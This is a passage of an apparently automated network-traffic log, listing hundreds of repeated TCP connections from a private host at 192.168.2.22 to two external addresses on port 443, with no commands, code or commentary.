Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 14.194.50.211:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 185.199.108.133:443
